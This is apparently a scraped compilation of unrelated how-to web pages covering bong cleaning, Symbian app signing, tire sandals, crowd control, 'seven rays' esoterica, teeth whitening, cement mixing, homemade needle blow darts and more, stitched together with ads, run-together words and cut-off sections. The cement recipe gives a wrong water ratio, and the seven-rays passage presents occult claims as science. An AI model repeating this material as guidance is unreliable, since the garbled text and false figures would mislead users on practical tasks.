Clean toothbrush by UVUV Dental Toothbrush Sanitizer 99.99% Sanitizing power.http://www.UVDental.com

Leather Magic EuropeLeather Care & Restoration Products Both Consumer & Professional Use.www.leathermagiceurope.co.uk

Denture cleaning tablets, such as Efferdent, also do a good job when you're cleaning a bong. Clean the residue out first, using the alcohol and abrasive outlined above. Instead of using the cleaner, dissolve the tabletsin water inside the bong.

A cleaning product named Bling is marketed specifically for bong cleaning.

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Guest Posted: Sat Dec 30, 2006 9:02 pm Post subject: HOW TO SIGN FExplorer (3rd edition) ** OLDPROCEDURE **

PLEASE, read this tutorial carefully, it works at 100% !, due to lack of time, I can't help you

more, so, don't send me an email regarding the signing process - sorry for this.

Step-to-step tutorial : HOW TO get a signed version of FExplorer

This tuto has been updated on 01/21/2008 to reflect the changes of symbiansigned.com

(all credits go to Team 3G365 )

You can find all the files needed in this tutorial here :


Here is the signing process :

1) Go to https://www.symbiansigned.com and register a new account

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How To Install Video Wallpaper on Your Desktop | How To Do Thing... http://www.howtodothings.com/computers-internet/how-to-install-vid...

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By Alex Lebedev

Difficulty: Cost:

How To Install Video Wallpaper on Your DesktopYou Don't Need Windows Vista Ultimate to Have Video Wallpaper on Your PC

Set up video as wallpaper on your desktop? Nice idea I think -- it is definitely the new thing. A few

months ago, this option on PC was available only for Windows Vista Ultimate users. They are still able

to add Windows DreamScene components via free Windows Update service. But now you can have

video wallpaper on any version of Windows!

The free VLC media player helps you to get this effect.

Go to the VLC media player web page. Download the latest version of VLC media player for

Windows (9.3 MB).


Double-click the downloaded self-extracting package (vlc-0.8.6e-win32.exe). Then

follow the instructions and install VLC media player. By the way, you can select whatever

language you prefer.


Start VLC media player. Select Settings -> Preferences. Preferences dialog box appears.3.

In the left pane of the Preferences dialog, click Video -> Output modules -> DirectX.

Click the Advanced Options check box in the lower right corner of the window. Click the Enable

Wallpaper Mode check box. Press the Save button.


In the main window of the player, click File -> Open File. Open... a dialog box appears.

Click Browse, and select the video file you want to install as video wallpaper. Click OK.


Now you got it! The selected video is playing right on your desktop. To turn off this effect, right-click

on video inside the VLC

media player and uncheck

the Wallpaper option.

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Sandals from an old auto tire, pt. 2 - Instructables - DIY, How To, craft... http://www.instructables.com/id/Sandals-from-an-old-auto-tire%2c-pt.-2/

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Sandals from an old auto tire, pt. 2by micmac on Jun 29, 2006 in CRAFT & OUTDOORS email it!

intro Sandals from an old auto tire, pt. 2Improve the comfort and look of the straps for your tire sandals.

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fegundez1 says:

ogeezer says:

noah joad says:

micmac says:

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i have a pair of mex sandals i bought in t j over ten years ago,they are indestructible...except the craftsman who made mine used some sort of heavy duty glue to attach the straps and the leather lining to the sole.the glue eventually wore out and the straps came out so i had to re-attach,but only after about four years

I used to make Ho Chi Mihn sandals for all members of our family, from the original design I'd seen countless times while serving in Vietnam, but micmac's design is better, particularly the strapassembly, illustrating Yankee-ingenuity at its best. Great idea, I'll have to try it out with my next tire change.

Hi, micmac.You said you used steel belted tires.How did you manage to cut them? I want to make me a pair of tire sandals, but tires without steel seems to be hard to find.

I used an angle grinder to cut the tire. It was messy, noisy, and stunk, but I couldn't face the struggle with a saw. It didn't take long at all once I got the hang of it. It IS tough to find tires w/o steel nowadays. Once you are done cutting them out, go over the edges with a pair of cutters and clean up any wires poking out. Instant pain/blood on any part of the body touched with the edge otherwise. I think the steel is essential to the sandal's success when it comes to the straps.

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LED super geek sandalIf you're maker of the adventuroustype who tries first and thinks later,when the…by faq42

Duct Tape SandalsIf you want to have some sandals fora warm day or a trip to thebeach/pool and ar…by thechad86

Make Sandals Out of Old JunkSo I found this rubber conveyor beltmaterial on the side of the road, thenI foun…by discontinuuity

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Pam Hsiang Trading Co LtdRoll Crown Grinder,Rubber Moulds, Rubber Continuous Vulcanizing Line. www.pht6168.com

Tire Recycling MachineryTechnologically Advanced Tire Recycling Plants and Machinery, www.rubbersolutions.biz

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A step-by-step plan is important to effective crowdcontrol. In order to ensure a well-policed event, policemanagers should prepare ahead of time for any conceivableproblems.


To plan for effective crowd control, police managers shouldconsider what personnel resources are available. For example, atraffic division with officers who are experienced in trafficflow is invaluable. Also invaluable when planning for crowdcontrol is a police auxiliary, which could help in areas wheresworn officers are not needed. In extreme cases, the NationalGuard can be used as additional resources.

Other personnel resources to draw from include officersfrom neighboring police departments, the fire department, thepublic works department, the Red Cross, and citizen band radioclubs. Private businesses, such as bus companies, are alsosometimes willing to lend equipment to assist in crowd control.Buses make effective barricades to block intersections.

Advance Notification

Another important task when planning for a special event isto notify businesses and residents in the affected area of howmuch disruption they can expect. Ground rules should bediscussed ahead of time so that there are no misunderstandingsduring the event. Also, if public transportation is expected tobe disrupted, alternate routes should be designated prior to theevent, and fire and ambulance personnel should be contacted todetermine checkpoints for rapid access routes.

Traffic Control

Traffic control is important to policing any major event.“No parking” areas should be designated and posted before theevent. Officials should advertise these restrictions throughthe media and through flyers sent to residents and businesses inthe affected areas.

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A Scheme of Things: The botanicals which I will discuss fall into several broad categories: 1) EVOCATIVE - used to get the attention of divinities or to summon spirits 2) DIVINATORY - used to foretell the future or to see hidden secrets 3) PURIFICATORY - used to purify the purpose of a rite or the action of a given object 4) ENHANCING - used to intensify the purpose of a rite or the action of a given object 5) PROTECTIVE - used to shield the user or area from harm 6) BANISHING - used to drive out unwanted influences or spirits 7) HEALING - used to promote wholeness in mind, body or spirit 8) SPELL CASTING - used to promote a purpose, e.g., love, fertility, money, luck, fortune, concentration, etc. Many botanicals fall into several categories, for example: Wormword (Artemesia) can be used 1) to evoke Artemis and call\ the dead 2) to promote divination 6) when consecrated to Mars in banishing 6) & 7) it was used to banish the Black Plague fleas 8) when consecrated to Mars, in works of anger. Ray Seven - Order, ceremony, organization, group,

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How To Turn a Digital Photo Print into a Beautiful Painting (using wat... http://www.instructables.com/id/SUVKT6WFA2KLXR5/

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How To Turn a Digital Photo Print into a Beautiful Painting (using water!)by theprojectmaker on Dec 14, 2007 in PHOTOGRAPHY & ART email it!

step 2 Some Basic TechniquesHere are some basic "reverse painting" techniques; they show different things you can do with the digital photo print and water. Every technique involves applying water - the difference is all in how it's done.

The basic techniques are: The Eraser, The Smudge, and Sanding.

The images in this step demonstrate these basics. The next step covers applying to entire photos to make themlook like paintings.

You can experiment to find your own techniques, too!

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How to Expand Ivory Soap - wikiHow http://www.wikihow.com/Expand-Ivory-Soap

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How to Expand Ivory Soap

Ivory bar soap has been known for its purity, versatility, and ability to float. It issoft, and safe for many skin types. But did you know that you can turn it into abig, soapy marshmallow, too?

StepsFill a bowl with water and drop a bar of Ivory soap into the bowl. (Notice how it floats? No other bar soap does.)1.

Remove the Ivory soap from the water, let it dry[Or it won't puff up as much] and place the bar in the middle of a platecovered with a paper towel. Place in the center of the microwave oven.


Cook the bar of soap on high for 2 minutes. Watch the bar of soap as itbegins to expand and erupt into beautiful puffy clouds. Be careful not to overcook your soap soufflé.


Allow the soap to cool for a minute. Touch it. Feel it. Look at it. It looks like a big marshmallow, but does it feel like one?Does it feel soft like a cotton ball? Would you like to scoop it up in your hands, and bring it to your cheek? Can youimagine it as appearing to be a big cloud in the sky?


Recognize the fact that this soft, white, fluffy glob, was once just a hard bar of Ivory Soap wrapped in paper.5.

TipsIvory soap floats because it has air pumped into it during the manufacturing process.

The expanding effect is caused by the heating of the water that is inside the soap. The water vaporizes, forming bubbles;the heat also causes trapped air to expand. Likewise, the heat causes the soap itself to soften and become pliable.

This experiment will make your kitchen and microwave smell like Ivory soap! Don't worry, the perfume dissipates and willnot linger.

WarningsThis experiment requires adult supervision and permission to use the microwave oven.

Use a microwave safe plate only.

Keep face away from microwave when removing soap.

The Bowl will be hot when taken out of the microwave.

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The author of this passage is the Tibetan Master, Djwhal Kuhl. He has been our primary source of information on the seven rays for the past 70 years. Until the end of the last century the seven ray system was known and taught only to a limited few disciples and adepts of the Ageless Wisdom. There have long been hints of this doctrine concealed within the teachings of all great philisophies and religions, but it has not been systematically presented, as have astrology or numerology. Astrology, since ancient times, has been divided into exoteric and esoteric branches. The ray teaching, however, has remained esoteric and largely hidden from the world. Only now, within the last seven decades, have we seen the beginnings of an exoteric presentation of the seven rays.

The reason for the new emergence of this ancient knowledge at this time seems quite simple. “When the student is ready, the teacher appears.” Humanity, the World Disciple, is apparently now ready, and stands on the threshold of a great awakening. New responsibilities, new opportunities and new light are being urged upon us by the Teachers of the race. Concurrent with this expansion is the need for a deeper, conscious penetration by the human race into the essential nature of reality. What was once occult mystery is now rapidly becoming practical science. Not only is the teaching on the rays emerging, but so are esoteric astrology, psychology, healing and many other formerly occult sciences receiving increased exoteric recognition.

What is meant by the word ‘ray’? The Tibetan answers this question in the following manner: “A ray is but a name for a particular force or type of energy, with the emphasis upon the quality which that force exhibits and not upon the form aspect which it creates.” (R I 316) The seven rays are seven qualities of energy. Rays do create forms, though the emphasis is not on the external, but rather on that which lies behind or within the form.

Ray One - Will, purpose, power, destruction Ray Two - Love, wisdom, inclusiveness, coherence, magnetism Ray Three - Active Intelligence, adaptability, creativity Ray Four - Harmony through conflict, beauty, sensitivity, unity Ray Five - Concrete knowledge, science, mind, analysis Ray Six - Devotion, idealism, adherence, force Ray Seven - Order, ceremony, organization, group, magic

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References: how to collect and present them

At the end of any project, dissertation or essay, it is extremely important to acknowledge all of the material that you have used to support your work in a list of references. This helps to distinguis h between your ideas and other people's ideas, and ensures that you avoid any possibility of uninten ded plagiarism. It is also evidence of what you have read.

Referencing involves:

Giving adequate detail of the material you have usedIt is important that your references describe all the documents referred to in a clear and systematic way that enables your readers to find and read those documents for themselves if they wish.

Being consistentIt is therefore vital that you:

adopt a consistent style and format with your references. adopt a consistent method for linking the statements in your text to the references to the material you have used. are aware of style requirements which you must follow. For example, your Department may have a style that they wish you to use. Or if you are writing for publication, e.g. aperiodical article, the periodical may have firm style guidelines.

For individual help with academic writing skills, contact the Study Advice Services. You can do this by email ([email protected]), telephone (ext.6344, or from outside the University [01482] 466344), or you can visit the Study Advice Services Desk in person on the ground floor of the Brynmor Jones Library (turn left immediately after entering the Library). The Study Advice Services website is at http://www.hull.ac.uk/studyadvice


Giving adequate detail of the material you have used - what to make a note ofBeing consistentLinking your text to your referencesFrequently asked questionsBibliography

1. Giving adequate detail of the material you have used

Collect as much information as possible about the material you consult, as you prepare for writing up. We recommend 5 inch x 3 inch (12.5cm x 7.5cm) cards to note down the details of all the material y ou use as you go along. It is possible to transfer your references to EndNote, a bibliographic softwa re package, available on the campus network. EndNote is an electronic filing system which can also organise your references into a standardised format. (For more information ask at the Computer Cen tre Helpdesk.)

What to make a note of

If you are using information from unusual sources, for example, computer software, film, sound recordings or some kinds of electronic resources, it would be worth looking at some of the items i n the Bibliography at the end of this factsheet to see what information is expected within the reference. For books, theses, periodical articles and web resources, you would expect to note the following .

Opposite to the list of elements that you would note, there is an example of one or more reference s, given in the name and date system, also known as the Harvard system. (This system is used with one particular method of linking your text to your references. See the section about this later on.) T his is not

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How To Whiten Teeth | How To Do Things.com http://www.howtodothings.com/fashion-personal-care/how-to-whiten-teeth

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By Bronwyn Harris

Difficulty: Cost:

How To Whiten Teeth

Tooth bleaching has now become the most sought-after dental treatment in the United States, with

the number of tooth whitening procedures being performed in dentists' offices increasing by more

than 300 percent in the last five year. There are many different options for those wishing to whiten

their teeth - from $25 over-the-counter strips to $600+ specialized in-office dental procedures.

Determine if you are a candidate for tooth whitening. Children under 16 years old, those

with sensitive teeth or gums, pregnant and nursing women, and those with peroxide allergies

should ask their dentist for advice before embarking upon a tooth whitening journey. Also,

remember that fillings and crowns will not bleach, and tooth whitening does not work on all



Avoid stains on your teeth. To avoid needing tooth whitening, limit foods and beverages that

stain, such as coffee, tea and red wine. Drinking from a straw can limit the effect of staining

beverages on teeth. Smoking, of course, also stains teeth.


Consider the commitment. Teeth that have been whitened will not stay white forever. Most

people need to get whitening touch-ups once or twice a year. If that sounds too high

maintenance for you, you might want to stick with your natural shade.


Use whitening strips. One popular method of whitening your teeth is to use whitening strips,

like Crest White Strips. These strips are flexible and are coated with a mild peroxide gel. They

conform to the shape of your teeth and produce results in 5 to 10 days. Since the levels of

hydrogen peroxide are lower than a dentist can provide, the strips will not act quickly, and may

cause tooth sensitivity or irritation to the gums.


Use whitening ampules. These whitening systems have individual ampules that are rubbed on

the teeth once or twice a day. They can also cause irritation and tooth sensitivity, and are often

more expensive - and effective than whitening strips.


Use over-the-counter whitening trays. These trays are formed to fit your mouth, and are

filled with the peroxide solution. They have the same advantages and disadvantages as the strips

and ampules - they are inexpensive but are not as effective as professional whitening, and can

cause irritation and sensitivity.


Get a custom mouth tray from your dentist. This tray is custom fit to your mouth, meaning

that there will be less gum irritation than when using an over-the-counter tray. You fill this tray

with a peroxide solution from your dentist. The procedure can take from one to three weeks, but

is generally successful. This is less expensive than having the procedure done in the dentist's

office but more expensive than over-the-counter treatments.


Get your whitening done by a professional. Although this is the most expensive option, it is

also the most successful. Since dentists can use a much higher concentration of hydrogen

peroxide than is available over the counter, your teeth will become much whiter. The hydrogen

peroxide gel is combined with laser or light treatments, and the gums are protected, leading to a

controlled, safe, and effective - if expensive - whitening experience.


Remember, not every stain can be helped by whitening. Yellowish stains are easier to bleach than

stains that are more gray, purple or brown. Talk to your dentist if you have specific questions about

whitening your teeth.


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Rapid Tooth WhiteningDentist Strength Bleaching Systems, Refill Gel Syringes, Towers & Pens. www.AtHomeWhitening.com

Whitelight Teeth whitenerIncludes light gel and mouth plate Whitens in just

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How To Write an SES Resume | How To Do Things.com http://www.howtodothings.com/careers/how-to-write-an-ses-resume

1 2 13/4/2008 10:18




By Jason Kay

Difficulty: Cost:

How To Write an SES Resume

No matter how many resumes you've prepared during the course of your career, your Senior

Executive Service (SES) resume will be the trickiest--but perhaps the most important. This resume is

unlike any other because SES jobs are some of the most elite and competitive in the country. Your

resume must combine the outstanding qualifications needed to secure an executive job with the

unique qualifications needed to obtain a government job. Those doing the hiring are looking for

proven leaders who can interact successfully with the loftiest members of the federal government.

And your first step into that world is a great resume.

Forget what you learned in college. About resumes, that is. You were probably advised to

keep bullet points to one or two lines and to limit your resume to one page in length (more on

that below). But you need to remember that you're in line for an executive position at the federal

level, so the rules that apply to an entry-level accountant don't apply to you. You've probably

been out of college for more decades than you care to think about, so your "education" section

should be near the end. Your resume needs to be focused on the hard-core, get-it-done examples

that will win you this next lucrative gig. And if you use bullet points, make them as long as

necessary to adequately illustrate the people, places, and circumstances that have made up your

career and prepared you for this next challenge.


Go long. It's normal--even expected--that your SES resume will be three pages long. Being

qualified for an SES position means that you will have extensive experience, and your resume

needs to outline that experience. That takes up some space! But if you're looking at a resume

that's more than four pages, you need to consider a different way to get your points across. If

you simply can't condense any copy without losing impact, attach a separate list of your projects

after your resume. A long resume is fine--a document that rivals War and Peace is not.


Name names. By this point in your career, you've undoubtedly worked for some bigwig

companies, so don't be afraid to provide details. Give a brief overview of the company (what they

do, what they're worth, number of employees, etc.). Even if it's a household name corporation

like McDonald's or Reebok, most people don't know the numbers associated with them. Being

vague will make the hiring manager wonder if you're hiding something, so don't generalize.


Give a before-and-after. It's also important for you to describe the challenges and expectations

you've met at each new level of your career. If you came into your current position with the

expectation that you'd dig an auto company out of $220 million in debt--and you did--that needs

to be fully explained. Describe where the company was when you arrived, what steps you took to

achieve success, and what the company looked like when you left.


Illustrate results with stories. Securing the right candidate for a top-level government job is a

huge investment of time and money, so the people doing the hiring are willing to read through

resumes carefully. Take the time to sketch out story examples of how you achieved bottom-line

results in your past or current position. Just make sure your stories aren't fairy tales. Lying to the

government (even "stretching the truth") isn't a good idea.


Be precise. Give them a yardstick to measure your success, rather than just numbers. If the

company achieved $800 million in revenues while you were president, tell them why that's so

great. Compare it to the year before you arrived, when revenues were at $400 million.


Highlight success through growth. It's imperative that you effectively describe your

forward-thinking capabilities, and that means showing how you've innovated in the past. SES

positions are all about leading change, so help them understand that you're a candidate who can

successfully evolve and adapt to changing circumstances--and guide others to do the same.



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Find a Book in the Library

Enter the library

Go to the card catalog (assuming no computer terminal system exists)

Pull out the drawer with the letters that correspond to the -title -subject -author

Find the card

Write down the code/call number

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1 3 15/4/2008 5:43

Lesson: 2Title: THE BLUES MELODY AND BLUES SCALE.Style: Blues, theoryLevel: IntermediateInstructor: Olav Torvund - http://www.torvund.net/guitar/ Those who want to play blues, should know the blues scale. Guitarplayers should know how to finger blues scales all the way up the neck in theso called "box position". But let us start with some peculiarities ofblues tonality. If you start from the root note and play a scale, a major scale islike this: (A major scale is often called a diatonic scale.) I + II + III - IV + V + VI + VII - I. In the most favored blues-guitar keys, it will be (starting in C-this time): C: C + D + E - F + G + A + B - CG: G + A + B - C + D + E + F# - GD: D + E + F# - G + A + B + C# - DA: A + B + C# - D + E + F# + G# - AE: E + F# + G# - A + B + C# + D# - E If there is a + between two notes, it indicates a whole step (twofrets), and - means a half step (one fret). The interval between notesI and III determines if it is major or minor scale: A major third,consisting of two whole steps (four frets) between the I and III notesgives major, and a minor third with one whole and one half step (threefrets) between notes I and III gives minor.

The blues scale is like this:

I + - IIIb + IV + V + - VIIb + I.

In the five keys, it will be:

C: C + - Eb + F + G + - Bb + C G: G + - Bb + C + D + - F + G D: D + - F + G + A + - C + D A: A + - C + D + E + - G + A E: E + - G + A + B + - D + E

It consists of 5 notes, compared to the 7 notes in the major scale.Notice that there is no II or VI notes, and the III and VII notes arelowered one half step.

If we write a major and a blues scale in parallel, they look likethis:

Major: I + II + III - IV + V + VI + VII - I Blues: I + - IIIb + IV + V + - VIIb + I

The interval I + - IIIb is a minor third, that should indicate a minorscale. But a blues melody is usually played over major chords. And amajor chord consists of the notes I + III + V. So we will often play amelody based on a scale with a minor third over chords with a majorthird. For that reason, blues does not have a very well establishedtonality, and that is part of the blues-sound.

You should also note the VIIb in the blues scale, compared to the VIIin the major scale. If you read my lesson about the 12-bar blues form,you will remember that I stressed the dominant-7 to tonika [tonic - ed]relationship, and I stressed the effect of the intervals built on theVII note: First of all the minor fifth interval from the VII note tothe IV note, but also the minor third interval from the VII note to theII note. Now you can notice that both the VII note and the II note areomitted from the blues scale, but are still part of the blues-harmony.

�Let us then introduce the "box positions":

ProbateIllinois.com - Frequently Asked Questions http://www.probateillinois.com/FAQ.html

1 7 22/4/2008 3:57


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What do I do if I can't find an answer to my questions below?

Click on the "Contact Us" button on this web site and write usor send an e-mail with your question to Paul Didzerekis [email protected] or [email protected]. Tell us if you want to becontacted by e-mail, snail mail or phone, giving us your e-mail address, phone number or snail mail address. We will get back toyou as promptly as possible.

Do I need to write a will?

Not everyone needs a will. If you are not married, have no childrenand have less than $1,000,000. in assets you may not need a will and can transfer your assets at death with joint tenancies or trust bank accounts. But, if you have a spouse and children, then youmost likely need a will. Take a look at your statutory will if you livein Illinois by clicking here.

I don’t live in Illinois, but a relative of mine died in Illinoisand they have no other relatives in Illinois to handle theestate. Do I need to hire two lawyers – one to act asadministrator and one to do the legal and court work?

No! If you have a case where your decedent died in Illinois andyou live out of Illinois you can retain an attorney to handle theestate and also act as administrator. If there is a will and namedyou or someone who cannot act as executor, you or someone withthe authority to appoint an administrator can name someone else toact as administrator with will annexed. You do not need twoindividuals or two attorneys to handle an estate. Someunscrupulous individuals may tell you that you need two attorneys –one to act as administrator and one to handle the legal work. This isnot true.

Can I probate a deceased relative’s estate without a lawyer?

Generally, one should seek a lawyer’s advice with respect to anymatter that has to be in court. Only the simplest estate will notneed some advice and representation by a lawyer.Estates of less than $100,000 can be handled with very littlepaperwork and no court involvement. Any estate of more than$100,000 or where there are contentious relatives probably needs alawyer’s assistance. This doesn’t mean that the lawyer has to doeverything. If you are very accustomed to working with financialand accounting matters and keep good records you can probably domost of the work yourself and rely on the lawyer to just do the court

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How To Mix Cement | How To Do Things.com http://www.howtodothings.com/home-and-garden/a4417-how-to-mix...

1 2 10/4/2008 9:13




By Grace Bloodwell

Difficulty: Cost:

How To Mix Cement

Think mixing cement is easy? Think again. While mixing cement is not brain surgery, it is can be an

arduous task that requires some degree of precision for peak performance. Cement is a bonding agent

used in conjunction with sand, water, and aggregate (crushed stone) to create mortar and/or concrete.

You need cement for a variety of projects--to set footings for decking or fences, to fill a sidewalk, or to

patch a blemish in your house's foundation. If you are doing a project that requires concrete or mortar

application, you will need to know how to mix the cement that bonds the materials together. Here is

how you mix cement.

Materials: Portland Cement. This is pure cement mix. You will need to buy enough sand and

aggregate to match the amount of cement you are buying (in the correct proportions) to mix in.

Read the back of the manufacturer's label and match the amounts needed for the project at hand.

This is the cheapest option for creating a concrete or mortar, but it involves more physical work

and time. If your project is large, this is the most cost-effective route, but prepare your muscles

for a workout. The basic formula for a cement mix is 1 part Portland cement, 1 part sand, and 1

part crushed stone to 24 parts water.


Materials: Pre-mixed concrete and mortar. Decide on the type of mix you will need. These

mixes contain all the sand and aggregate you will need for the job. All you need to do is mix the

dry content with water. Make sure you buy mortar for jobs that require mortar, and concrete for

the jobs that require concrete--in almost all cases, they are not interchangeable.


Where to Buy? Aggregate and Sand: These materials can be found at garden supply stores.

They are sold by the cubic meter. Ask an expert at the store to assist you in getting the correct

proportions for the task at hand.


Where to Buy? Lime: If you need the mortar or concrete to have maximum adhesive qualities,

you'll want to add lime. Lime can be purchased at garden wholesale stores as well.


With A Mixer: You can purchase a small drum mixer for around $400 dollars or less. The mixer is

a machine that is perfect for small to medium jobs: patch work, filling part of a sidewalk, filling in

foundation. Jobs such as a driveway fill or in-ground swimming pool are not suitable tasks for the

mixer. For large jobs like this, hire a commercial truck.


Without a Mixer. It is possible to mix cement without a mixer. This approach should be used

exclusively for smaller projects. It can be a demanding procedure--mix is heavy. Only attempt the

mixing process sans mixer if the project requires less than 10 cubic feet of mixed material. Use

the proper ratio of dry material and add water as you mix. Use a durable trowel to mash and mix

the materials together. Remember that cement dries, so you'll need to complete your project in a

timely manner. Be sure to mix the amount appropriate for your task.


Safety. Cement mix contains lime, which is a hazardous material. Do any mixing in a ventilated

area. Avoid touching the dry mix with your hands as much as possible. Wear gloves and a mask

during the mixing process.


If you are planning on mixing cement on your own, be sure to read the manufacturer's label to ensure

you are using the correct materials and proportions for the mixture. Good luck!


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Blow darts are easy to make and all the materials can be found in your own home. These darts can travel a long distance with good penetration if constructed correctly.

Materials needed:

A small piece of wood A sewing machine needle A spool of thread A couple nails Hammer Glue Scissors

Hammer the two nails about two inches apart on the board. Wrap the thread tightly around the two nails. The number of times the thread is wrapped aroun

the nails will determine the amount of weight and stability the dart has. Onc

you have decided you have wrapped enough thread, cut it close to the nail at around a half inch. Take this small tuft of thread and put a dab of glue on the folded end. The kind of glue you use is very important. I suggest that you us

a tacky kind of glue (nothing runny, like Elmer’s glue). Attach this to the needle and hold until it is dry. Another kind of dart can be made with Q-tips. This kind of dart doesn’t work as well as the first one, but it is sometimes easier to make. first you have to get the kind of Q-tips that have a plastic stem. Cut the Q-tip close to one end. Insert the sewing needle into the Q-tip and secure it by melting the plastic slightly with a lighter. This kind of dart doesn’t last long because the cotton come off easily.

Blow Guns:

Ordinary straws make an excellent blow gun with this kind of dart. Another kind can be made with a cheap pen by taking apart the pen and using the shell

Any long, cylindrical, object with the diameter of a straw will work very wel

Page 160: The Instructional Capital volume I

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How To Apply for a Scholarship | How To Do Things.com http://www.howtodothings.com/education/how-to-apply-for-a-scholarship

1 2 13/4/2008 10:18




By Ae Dechavez

Difficulty: Cost:

How To Apply for a Scholarship

Applying for scholarships is one good way of saving money, so you can put additional money into your

savings account instead of just taking away from your bank for your regular expenses.

You might be having second thoughts because first of all, applying for a scholarship is not easy.

Secondly, there is the discouraging thought that if you do qualify, you might only get minimal support

based on your average income bracket. However, you may still be qualified, and there are very good

reasons for you to take this advantage -- to enhance not just your academic performance, but also

your saving plans. Good reasons to apply for a scholarship, right?

Look for the right scholarship. Have a list of all scholarships you might just qualify in. Exhaust

every available one in your area, even looking at financial grants. Do your research. Just a tip

though: if you plan to look it up on the internet, beware of scams. Scholarship offers have

become a scammer favorite. You need to watch out. Look for authentic ones by searching for

privacy policy, knowing about the organization's admin, the sponsors, etc. Trying to know

everything about the scholarship is also one of the best ways you can prepare to be among the

chosen ones (of all the applicants!).


Remember that being a scholar means doing your best to deserve it. Have that eagerness

from start to finish. It is crucial to show that you already have this potential during your

application phase. Make sure you have the right attitude.


After you've narrowed down your targets (those you think you're most eligible in),

immediately start calling the scholarship service providers. Now that you're ready, confirm

all information you've gathered. Make sure you follow all your inquiries by requesting for

application packets sent via email. It's also best to send them a self-addressed stamped

envelope. You should let them know that you indeed plan to use the packet. Don't forget to give

your name. Let them know that you're serious about your application. Then, stand-by for that



Organize all your requirements and make sure you submit them on time. Always get your

documents ready, especially your transcript and recommendation letters. Also remember to keep



Estimate the time that your scholarship provider will receive your application. Don't mail

it on the due date or just before it. After you've sent in your application, confirm that they indeed

received it.


Don't stop with your first application. Don't ever get tired of applying. Follow up your first

application immediately with another one. Repeat the process with all other scholarships you

might just qualify in. Who knows? There might be a time when they're the ones lined up for your

picking. So don't miss any chances.


Applying for scholarships is big deal - the rewards are also great.


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How To Connect With the Gay and Lesbian Community in Austin | ... http://www.ehow.com/how_2213833_connect-gay-lesbian-community...

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Instructions Difficulty: Easy

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How to Connect With the Gay and Lesbian Community in AustinBy Complexity

Rate: (2 Ratings)

The “Live Music Capital of the World” offers a world of support to its gay,lesbian, bisexual and transgender residents. From the University of Texas togay sports, Austin is in harmony with the GLBT community.

Step 1:Go to Allgo, an organization for queer people of color, online or at 701 TilleryStreet, on the east side of Austin. There, you’ll find networking, social eventsand wellness seminars that focus on breast cancer and HIV, among otherconcerns. Activities include an AfroCaribean Queer meet-up, Womyn's Nightand ButchFest.

Step 2:Renew your Pride. Austin Pride takes place in June but you can get to knowpeople all year long through networking and other events.

Step 3:Get a nose for news. Check out the Gay and Lesbian Chamber of Commercepublication, Forward, published four times a year. Or turn to the gay pages of the Austin Chronicle.

Step 4:Go out and about to Austin’s gay and lesbian bars, which include ‘Bout Time,9601 IH-35 North, Charlie’s Austin, 1301 Lavaca Street and Oilcan Harry’s, 211West 4th Street.

Step 5:Learn about the GLBT groups at the University of Texas such as the DeltaLambda Phi social fraternity.

Step 6:Tackle a new sport like gay rugby or soccer or try some outdoor adventureswith the gay camping group.

Step 7:Find your niche in politics or other areas. Look into Equality Texas, the LipstickLesbians or Out Youth for like-minded gays and lesbians.

Gay and Lesbian TravelEnjoy Reno-Tahoe as a great gay travel destination.www.visitrenotahoe.com

Meet Fit Gay Men Near YouPersonals, Workouts, Forums & Chat Join the Free Gay FitnessCommunitywww.RealJock.com

Videos & PicturesRelax and Watch a Video! 100% Free100links.com/video

Musica sul Tuo CellulareMigliaia di Suonerie da scaricare Scegli la Tua Preferita!Dada.net/Musica

Don’t forget that Austin’s great music festivals are also packed withGLBT attendees.Check out Austin’s local, independent bookstores for more informationon the GLBT community.

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How To Avoid Buying Useless Florida Swampland | eHow.com http://www.ehow.com/how_2245963_avoid-buying-useless-florida-s...

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Instructions Difficulty: Moderately Easy

How to Avoid Buying Useless Florida SwamplandBy Virginia Allain

Rate: (2 Ratings)

Everyone wants their little space in paradise. Ifyou don't check the background before buying land in Florida (or elsewhere), you could end up with a useless property. Here's advice fromthe Lake County (FL) Property Appraiser's Office and from the Florida Attorney General.

Things You’ll Need:

phoneinternet access

Step 1:Call the local property appraiser and ask about the location.Check this website to get the property appraiser's name,

address and email for each Florida county: http://www.propertyappraiser.com/Move the cursor over the map (without clicking) and the info appears.

Step 2:Look at the assessed value and annual taxes for the property. If the owner paidless than $1 in taxes for more than an acre of nonhomesteaded property, that should be a warning sign.

Step 3:Check with local officials about zoning and land-use regulations. Ask aboutroads and utilities serving the property. Find out what you would be allowed tobuild.

Step 4:Check out the seller. If looking at property for sale online, try to verify theseller's background. Some sites like E-Bay use a rating system for sellers. If it'sa development, then check with HUD, your local and state consumer office, Better Business Bureau, and state agencies that regulate real estate salespersons and contractors to learn if there have been any complaints. Find

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3D chocolate printer made from LEGO: lets build some chocolate stuff!... http://www.instructables.com/id/EBOZIY3579EP2862FW/

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Feb 17, 2008. 1:33 PM

Jan 4, 2008. 5:16 PM

3D chocolate printer made from LEGOby saul on Aug 16, 2005 in FOOD & TECH email it!

step 10 lets build some chocolate stuff!Here's the finished (well, you know, in a rough prototype kind of way) printer.

there are only 3 controllable ports on the rcx brick i used, so one for x, one for y, and one for the extrusion control. you'd need to gang two rcx bricks to further control temperature and the z axis.

I did end up doing 5 layer builds of 3D things like the letter A. unfortunately without a release / support materialthe geometry is limited, but it was still cool.

hopefully someone will rebuild this and simplify it.

chocprint-G.mpg 4 MB

LEGO.mpg 578 KB

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zeplin00 says:

jakesllama says:

rating: 30


petrosmoris INBOX (0) logout | Help


this ROCKS I didn't do it but one of my friends did =P

you should enter a Lego contest!very cool

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views: 41.063

category: food & tech

keywords: LEGO, CNC, MissingNo, chocolate, printer, 3DChocolatePrinter, 3D, candy

author: saul

published: Aug 16, 2005

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How to Build a Robot Tutorial - Society of Robots http://www.societyofrobots.com/robot_tutorial.shtml

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BEGINNERS: How to Build Your First Robot Tutorial

Motivation | Costs | Parts | Batteries | Circuits | Sensors | Chassis | Tips

If you would like to see a step-by-step robot tutorial, visit my The $50 Robot Tutorial after reading this page.

Motivation is key to success. Why build a robot? What are your motivations? Do they look cool? Want tojoin a robotics contest such as battlebots? Robotics can teach you so much .You will learn skills ranging from electronics, mechanics, controls,programming, and even as broad as understanding animal behavior andhuman psychology. It is best before starting this robot tutorial to ask yo urselfwhat your goals of creating a robot are, and what are your motivations -otherwise you may quit halfway not quite knowing why you started.

